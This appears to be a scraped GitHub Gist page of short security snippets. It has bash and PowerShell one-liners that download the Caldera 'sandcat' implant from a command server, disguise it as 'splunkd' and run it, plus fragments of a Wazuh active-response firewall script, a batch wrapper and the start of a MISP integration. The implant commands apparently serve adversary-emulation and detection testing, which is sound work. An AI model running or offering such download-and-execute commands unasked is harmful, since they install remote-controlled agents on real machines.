This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
server="http://evil.socfortress.co:8888"; | |
curl -s -X POST -H "file:sandcat.go" -H "platform:linux" $server/file/download > splunkd; | |
chmod +x splunkd; | |
./splunkd -server $server -group red -v |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
$server="http://evil.socfortress.co:8888"; | |
$url="$server/file/download"; | |
$wc=New-Object System.Net.WebClient; | |
$wc.Headers.add("platform","windows"); | |
$wc.Headers.add("file","sandcat.go"); | |
$data=$wc.DownloadData($url); | |
$name=$wc.ResponseHeaders["Content-Disposition"].Substring($wc.ResponseHeaders["Content-Disposition"].IndexOf("filename=")+9).Replace("`"",""); | |
get-process | ? {$_.modules.filename -like "C:\Users\Public\$name.exe"} | stop-process -f; | |
rm -force "C:\Users\Public\$name.exe" -ea ignore; | |
[io.file]::WriteAllBytes("C:\Users\Public\$name.exe",$data) | Out-Null; |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
################################ | |
##Script to add/remove destination ip to windows firewall | |
################################ | |
########## | |
##info@opensecure.co | |
########## | |
# Read the Alert that triggered the Active Response in manager and convert to Array | |
$INPUT_JSON = Read-Host | |
$INPUT_ARRAY = $INPUT_JSON | ConvertFrom-Json | |
$INPUT_ARRAY = $INPUT_ARRAY | ConvertFrom-Json |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
:: Simple script to run Windows Firewall Block | |
:: The script executes a powershell script and appends output. | |
@ECHO OFF | |
ECHO. | |
"C:\Program Files\PowerShell\7\"pwsh.exe -executionpolicy ByPass -File "C:\Program Files (x86)\ossec-agent\active-response\bin\windowsfirewall.ps1" | |
:Exit |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/var/ossec/framework/python/bin/python3 | |
## MISP API Integration | |
# | |
import sys | |
import os | |
from socket import socket, AF_UNIX, SOCK_DGRAM | |
from datetime import date, datetime, timedelta | |
import time | |
import requests | |
from requests.exceptions import ConnectionError |